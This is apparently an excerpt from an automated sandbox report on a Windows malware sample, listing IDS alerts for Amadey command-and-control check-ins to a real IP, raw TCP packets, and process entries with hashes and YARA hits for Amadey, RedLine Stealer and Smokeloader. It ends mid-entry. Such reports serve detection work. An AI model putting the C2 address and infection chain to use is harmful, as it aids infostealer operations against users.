192.168.2.662.204.41.450343802027700 02/07/23-20:03:45.134037	TCP	2027700	ET TROJAN Amadey CnC Check-In	50343	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450182802027700 02/07/23-20:03:03.137173	TCP	2027700	ET TROJAN Amadey CnC Check-In	50182	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449795802027700 02/07/23-20:01:11.503277	TCP	2027700	ET TROJAN Amadey CnC Check-In	49795	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450124802027700 02/07/23-20:02:45.914007	TCP	2027700	ET TROJAN Amadey CnC Check-In	50124	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449854802027700 02/07/23-20:01:26.635794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49854	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450307802027700 02/07/23-20:03:36.268284	TCP	2027700	ET TROJAN Amadey CnC Check-In	50307	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449895802027700 02/07/23-20:01:38.089700	TCP	2027700	ET TROJAN Amadey CnC Check-In	49895	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449932802027700 02/07/23-20:01:50.862632	TCP	2027700	ET TROJAN Amadey CnC Check-In	49932	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450302802027700 02/07/23-20:03:35.050150	TCP	2027700	ET TROJAN Amadey CnC Check-In	50302	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450473802027700 02/07/23-20:04:16.958101	TCP	2027700	ET TROJAN Amadey CnC Check-In	50473	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449846802027700 02/07/23-20:01:23.606581	TCP	2027700	ET TROJAN Amadey CnC Check-In	49846	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450465802027700 02/07/23-20:04:14.989652	TCP	2027700	ET TROJAN Amadey CnC Check-In	50465	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450070802027700 02/07/23-20:02:31.982508	TCP	2027700	ET TROJAN Amadey CnC Check-In	50070	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449935802027700 02/07/23-20:01:51.579500	TCP	2027700	ET TROJAN Amadey CnC Check-In	49935	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450076802027700 02/07/23-20:02:33.409323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50076	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450165802027700 02/07/23-20:02:59.233846	TCP	2027700	ET TROJAN Amadey CnC Check-In	50165	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450376802027700 02/07/23-20:03:53.252674	TCP	2027700	ET TROJAN Amadey CnC Check-In	50376	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449892802027700 02/07/23-20:01:37.344208	TCP	2027700	ET TROJAN Amadey CnC Check-In	49892	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449953802027700 02/07/23-20:01:56.032155	TCP	2027700	ET TROJAN Amadey CnC Check-In	49953	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449757802027700 02/07/23-20:01:00.338641	TCP	2027700	ET TROJAN Amadey CnC Check-In	49757	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449981802027700 02/07/23-20:02:02.719021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49981	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450137802027700 02/07/23-20:02:52.411572	TCP	2027700	ET TROJAN Amadey CnC Check-In	50137	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450131802027700 02/07/23-20:02:50.831579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50131	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449864802027700 02/07/23-20:01:30.634611	TCP	2027700	ET TROJAN Amadey CnC Check-In	49864	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449907802027700 02/07/23-20:01:41.092787	TCP	2027700	ET TROJAN Amadey CnC Check-In	49907	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450042802027700 02/07/23-20:02:21.298484	TCP	2027700	ET TROJAN Amadey CnC Check-In	50042	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450198802027700 02/07/23-20:03:07.083063	TCP	2027700	ET TROJAN Amadey CnC Check-In	50198	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450048802027700 02/07/23-20:02:22.753627	TCP	2027700	ET TROJAN Amadey CnC Check-In	50048	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449775802027700 02/07/23-20:01:04.516285	TCP	2027700	ET TROJAN Amadey CnC Check-In	49775	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450287802027700 02/07/23-20:03:31.342737	TCP	2027700	ET TROJAN Amadey CnC Check-In	50287	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450220802027700 02/07/23-20:03:12.442628	TCP	2027700	ET TROJAN Amadey CnC Check-In	50220	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450315802027700 02/07/23-20:03:38.266612	TCP	2027700	ET TROJAN Amadey CnC Check-In	50315	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450226802027700 02/07/23-20:03:13.874522	TCP	2027700	ET TROJAN Amadey CnC Check-In	50226	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450394802027700 02/07/23-20:03:57.671451	TCP	2027700	ET TROJAN Amadey CnC Check-In	50394	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450119802027700 02/07/23-20:02:44.644394	TCP	2027700	ET TROJAN Amadey CnC Check-In	50119	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450208802027700 02/07/23-20:03:09.500907	TCP	2027700	ET TROJAN Amadey CnC Check-In	50208	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450404802027700 02/07/23-20:04:00.112465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50404	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450060802027700 02/07/23-20:02:26.448814	TCP	2027700	ET TROJAN Amadey CnC Check-In	50060	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450103802027700 02/07/23-20:02:40.685701	TCP	2027700	ET TROJAN Amadey CnC Check-In	50103	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450109802027700 02/07/23-20:02:42.172519	TCP	2027700	ET TROJAN Amadey CnC Check-In	50109	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449969802027700 02/07/23-20:01:59.969581	TCP	2027700	ET TROJAN Amadey CnC Check-In	49969	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450080802027700 02/07/23-20:02:34.379327	TCP	2027700	ET TROJAN Amadey CnC Check-In	50080	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449874802027700 02/07/23-20:01:33.109253	TCP	2027700	ET TROJAN Amadey CnC Check-In	49874	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449963802027700 02/07/23-20:01:58.504584	TCP	2027700	ET TROJAN Amadey CnC Check-In	49963	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449785802027700 02/07/23-20:01:07.828926	TCP	2027700	ET TROJAN Amadey CnC Check-In	49785	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450210802027700 02/07/23-20:03:09.990259	TCP	2027700	ET TROJAN Amadey CnC Check-In	50210	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450032802027700 02/07/23-20:02:18.890388	TCP	2027700	ET TROJAN Amadey CnC Check-In	50032	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450014802027700 02/07/23-20:02:14.441730	TCP	2027700	ET TROJAN Amadey CnC Check-In	50014	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450121802027700 02/07/23-20:02:45.141107	TCP	2027700	ET TROJAN Amadey CnC Check-In	50121	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450338802027700 02/07/23-20:03:43.908584	TCP	2027700	ET TROJAN Amadey CnC Check-In	50338	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450427802027700 02/07/23-20:04:05.737324	TCP	2027700	ET TROJAN Amadey CnC Check-In	50427	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449823802027700 02/07/23-20:01:18.077794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49823	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449808802027700 02/07/23-20:01:14.637798	TCP	2027700	ET TROJAN Amadey CnC Check-In	49808	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449820802027700 02/07/23-20:01:17.299894	TCP	2027700	ET TROJAN Amadey CnC Check-In	49820	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449979802027700 02/07/23-20:02:02.207618	TCP	2027700	ET TROJAN Amadey CnC Check-In	49979	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449731802027700 02/07/23-20:00:54.023441	TCP	2027700	ET TROJAN Amadey CnC Check-In	49731	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449912802027700 02/07/23-20:01:42.328220	TCP	2027700	ET TROJAN Amadey CnC Check-In	49912	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449994802027700 02/07/23-20:02:09.136024	TCP	2027700	ET TROJAN Amadey CnC Check-In	49994	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450264802027700 02/07/23-20:03:25.691639	TCP	2027700	ET TROJAN Amadey CnC Check-In	50264	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450353802027700 02/07/23-20:03:47.599615	TCP	2027700	ET TROJAN Amadey CnC Check-In	50353	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449734802027700 02/07/23-20:00:54.737090	TCP	2027700	ET TROJAN Amadey CnC Check-In	49734	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450001802027700 02/07/23-20:02:11.159823	TCP	2027700	ET TROJAN Amadey CnC Check-In	50001	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450350802027700 02/07/23-20:03:46.848980	TCP	2027700	ET TROJAN Amadey CnC Check-In	50350	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450172802027700 02/07/23-20:03:00.921461	TCP	2027700	ET TROJAN Amadey CnC Check-In	50172	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450261802027700 02/07/23-20:03:23.514341	TCP	2027700	ET TROJAN Amadey CnC Check-In	50261	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450442802027700 02/07/23-20:04:09.409561	TCP	2027700	ET TROJAN Amadey CnC Check-In	50442	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450083802027700 02/07/23-20:02:35.239474	TCP	2027700	ET TROJAN Amadey CnC Check-In	50083	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450086802027700 02/07/23-20:02:36.208344	TCP	2027700	ET TROJAN Amadey CnC Check-In	50086	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450004802027700 02/07/23-20:02:11.893867	TCP	2027700	ET TROJAN Amadey CnC Check-In	50004	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450175802027700 02/07/23-20:03:01.662459	TCP	2027700	ET TROJAN Amadey CnC Check-In	50175	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450249802027700 02/07/23-20:03:19.487023	TCP	2027700	ET TROJAN Amadey CnC Check-In	50249	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449925802027700 02/07/23-20:01:47.192101	TCP	2027700	ET TROJAN Amadey CnC Check-In	49925	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450414802027700 02/07/23-20:04:02.595462	TCP	2027700	ET TROJAN Amadey CnC Check-In	50414	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450325802027700 02/07/23-20:03:40.711953	TCP	2027700	ET TROJAN Amadey CnC Check-In	50325	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450455802027700 02/07/23-20:04:12.584652	TCP	2027700	ET TROJAN Amadey CnC Check-In	50455	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449747802027700 02/07/23-20:00:57.887103	TCP	2027700	ET TROJAN Amadey CnC Check-In	49747	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449966802027700 02/07/23-20:01:59.250311	TCP	2027700	ET TROJAN Amadey CnC Check-In	49966	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449877802027700 02/07/23-20:01:33.832947	TCP	2027700	ET TROJAN Amadey CnC Check-In	49877	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449836802027700 02/07/23-20:01:21.202537	TCP	2027700	ET TROJAN Amadey CnC Check-In	49836	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449772802027700 02/07/23-20:01:03.779261	TCP	2027700	ET TROJAN Amadey CnC Check-In	49772	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449788802027700 02/07/23-20:01:09.765672	TCP	2027700	ET TROJAN Amadey CnC Check-In	49788	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449991802027700 02/07/23-20:02:05.764041	TCP	2027700	ET TROJAN Amadey CnC Check-In	49991	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449861802027700 02/07/23-20:01:29.882532	TCP	2027700	ET TROJAN Amadey CnC Check-In	49861	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450058802027700 02/07/23-20:02:25.697906	TCP	2027700	ET TROJAN Amadey CnC Check-In	50058	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450236802027700 02/07/23-20:03:16.324345	TCP	2027700	ET TROJAN Amadey CnC Check-In	50236	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450017802027700 02/07/23-20:02:15.190910	TCP	2027700	ET TROJAN Amadey CnC Check-In	50017	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450366802027700 02/07/23-20:03:50.757393	TCP	2027700	ET TROJAN Amadey CnC Check-In	50366	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450099802027700 02/07/23-20:02:39.663652	TCP	2027700	ET TROJAN Amadey CnC Check-In	50099	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450147802027700 02/07/23-20:02:54.873680	TCP	2027700	ET TROJAN Amadey CnC Check-In	50147	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450188802027700 02/07/23-20:03:04.590702	TCP	2027700	ET TROJAN Amadey CnC Check-In	50188	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450277802027700 02/07/23-20:03:28.892621	TCP	2027700	ET TROJAN Amadey CnC Check-In	50277	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450106802027700 02/07/23-20:02:41.451184	TCP	2027700	ET TROJAN Amadey CnC Check-In	50106	80	192.168.2.6	62.204.41.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 20:00:50.777110100 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.777430058 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.836796045 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.837024927 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.839792013 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.840023994 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.878460884 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.895771027 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.938014984 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.942157030 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.942238092 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.958383083 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.958431959 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.958585978 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.114259005 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.137717009 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.140268087 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.176861048 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177059889 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177088976 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177117109 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177130938 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177145004 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177175045 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177175045 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177177906 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177192926 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177210093 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177238941 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177247047 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177269936 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177274942 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177303076 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177309036 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177328110 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177334070 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177356005 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177378893 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.197297096 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.197442055 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.201834917 CET	80	49720	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.202111006 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.202652931 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.239826918 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239861012 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239885092 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239897013 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.239913940 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239943981 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239953995 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.239972115 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239974976 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240003109 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240024090 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240024090 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240047932 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240068913 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240072012 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240104914 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240139008 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.264234066 CET	80	49720	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.268384933 CET	80	49720	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.268486977 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.302772045 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302845001 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302895069 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302941084 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302957058 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.302989006 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303020000 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303039074 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303060055 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303090096 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303095102 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303137064 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303142071 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303189039 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303189993 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303235054 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303235054 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303278923 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303287029 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303340912 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366169930 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366204023 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366229057 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366250038 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366271019 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366292953 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366293907 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366293907 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366314888 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366337061 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366344929 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366358995 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366369963 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366384029 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366405964 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366413116 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366444111 CET	49719	80	192.168.2.6	62.204.41.4

HTTP Request Dependency Graph

62.204.41.4

Target ID:	0
Start time:	20:00:13
Start date:	07/02/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xeb0000
File size:	537088 bytes
MD5 hash:	16755B75334B8655BC2357553A9FDAB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: bfCg.exePID: 2564, Parent PID: 1216

General

Target ID:	1
Start time:	20:00:13
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
Imagebase:	0x940000
File size:	346112 bytes
MD5 hash:	DAE3685D13248C42313D46F76E2EC968
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs
Reputation:	low

Analysis Process: afCf.exePID: 2360, Parent PID: 2564

General

Target ID:	2
Start time:	20:00:14
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
Imagebase:	0x400000
File size:	251392 bytes
MD5 hash:	6E870598039CCE621C7BB265AC99BB3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low

Analysis Process: rundll32.exePID: 5164, Parent PID: 3452

General

Target ID:	3
Start time:	20:00:26
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff64d2d0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: nika.exePID: 6036, Parent PID: 2564

General

Target ID:	6
Start time:	20:00:32
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Imagebase:	0xad0000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	moderate

Analysis Process: rundll32.exePID: 5168, Parent PID: 3452

General

Target ID:	10
Start time:	20:00:34
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff64d2d0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: xriv.exePID: 1744, Parent PID: 1216

General

Target ID:	11
Start time:	20:00:44
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Imagebase:	0x1360000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Analysis Process: mnolyk.exePID: 1276, Parent PID: 1744

General

Target ID:	12
Start time:	20:00:45
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
